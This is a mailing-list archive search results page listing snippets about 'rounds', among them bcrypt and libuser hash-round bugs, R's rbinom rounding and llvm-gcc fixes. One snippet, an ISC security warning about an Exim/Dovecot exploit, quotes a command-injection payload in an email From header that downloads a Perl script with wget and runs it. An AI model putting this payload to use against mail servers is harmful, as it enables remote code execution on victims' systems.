similar to: as.numeric rounds up

Displaying 10 results from an estimated 10 matches similar to: "as.numeric rounds up"

2013 May 02
3
[Bug 2097] New: if gensalt's log_rounds parameter is set to 31 it does 0 (ZERO) rounds!
https://bugzilla.mindrot.org/show_bug.cgi?id=2097 Bug ID: 2097 Summary: if gensalt's log_rounds parameter is set to 31 it does 0 (ZERO) rounds! Classification: Unclassified Product: jBCrypt Version: unspecified Hardware: All OS: All Status: NEW Severity: security
2013 Jun 09
1
from ISC: Exim/Dovecot exploit making the rounds
One of our readers wrote in to let us know that he had received an attempted Exim/Dovecot exploit attempt against his email server. The exploit partially looked like this: From: x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com (Obviously edited for your safety, and I didn't post the whole thing.) This is an exploit against Dovecot that is using
2002 Dec 15
0
[LLVMdev] Re: llvm-gcc goes 10 rounds against the GNU mascot and loses, film at 11
Brian was kind enough to test llvmgcc against a bunch of GNU code. This exposed all kinds of bugs, fixes below. > recode -- fails (bad headers, many ICEs) Can you give me a list of headers it wants? It's usally pretty easy to add them if I know what it needs... > cpio -- fails (dstring.c -- weird ssa bug) Fixed. This was a C frontend bug (problem assigning temporary reg nums).
2002 Mar 12
1
rbinom silently rounds size argument (PR#1377)
rbinom (in R-1.4.1) silently rounds its "size" argument. The C code contains n = floor(nin + 0.5); I would argue that this should this either be documented or changed (to return NA). (The behavior is inconsistent with dbinom). I sent this in to the devel list a couple of weeks ago to provoke discussion; no disagreement (or agreement) so I'm submitting it as a bug.
2014 Jan 08
0
Hash rounds in /etc/libuser.conf won't work - how to report a bug
Two weeks ago I reported a problem I was having in the CentOS 5 Security Support forum. I could not get hash rounds, configured in /etc/libuser.conf, to work on CentOS release 5.10 (Final), 2.6.18-371.3.1.el5 x86_64. The details are here: https:// www.centos.org/forums/viewforum.php?f=24&sid=44859638070165ed5d8d9c35cdbe0378 I read all the documentation and looked for more off the CentOS
2014 Jan 09
0
Hash rounds in /etc/libuser.conf won't work
Two weeks ago I reported a problem I was having in the CentOS 5 Security Support forum. I could not get hash rounds, configured in /etc/libuser.conf, to work on CentOS release 5.10 (Final), 2.6.18-371.3.1.el5 x86_64. The details are here: https://www.centos.org/forums/viewtopic.php?f=24&t=44245&sid=975951a5a0eb264945bbf550ea076278 I read all the documentation and looked for more off the
2009 Jul 30
1
Continue to finish for loop even there is an error in one of rounds.
I am trying to fit a logistic model to my 10 year data (1999-2008) by year. Codes like below: Year <- c(1999: 2008) for(y in 1:length(year)) { file.input <- paste("C:\\", year[y], "\\data.csv", sep="") table <- read.csv(file=fileinput, header=TRUE, as.is=TRUE, na.strings=c("")) initial <- getInitial(percent ~ SSlogis(age, Asym,
2018 Sep 26
0
Can't authenticate using ARGON2ID crypt scheme from doveadm pw w/rounds != default
The reason it fails is because auth process runs out of memory and there is a bug in libsodium which causes it to crash in this scenario. The fix is to do service auth { ? vsz_limit = 0 # or 2G at least } Aki On 26.09.2018 09:12, Keith Amidon wrote: > I'm using dovecot version 2.3.2.1 (0719df592) and trying to use the > ARGON2ID crypt scheme for authentication using the passdb
2018 Sep 26
2
Can't authenticate using ARGON2ID crypt scheme from doveadm pw w/rounds != default
I'm using dovecot version 2.3.2.1 (0719df592) and trying to use the ARGON2ID crypt scheme for authentication using the passdb passwd-file driver. My passdb config is very simple: ??? passdb { ????? driver = passwd-file ????? args = username_format=%u <path-to-file-here> ??? } If I generate a password this way: ??? doveadm pw -s ARGON2ID -p 'This is a test' I get a crypt
2014 Feb 04
0
Password hash rounds solved - important security implications
A member of the scientific-linux-users at fnal.gov wrote: On 01/14/2014 04:19 PM, George Shaffer wrote: > > If anyone has gotten password hash rounds using hash_rounds_min and > > hash_rounds_max in libuser.conf, or the counter part in login.defs > > (SHA_CRYPT_MIN_ROUNDS, SHA_CRYPT_MAX_ROUNDS), to work on any RHEL related > > distribution, I would appreciate knowing how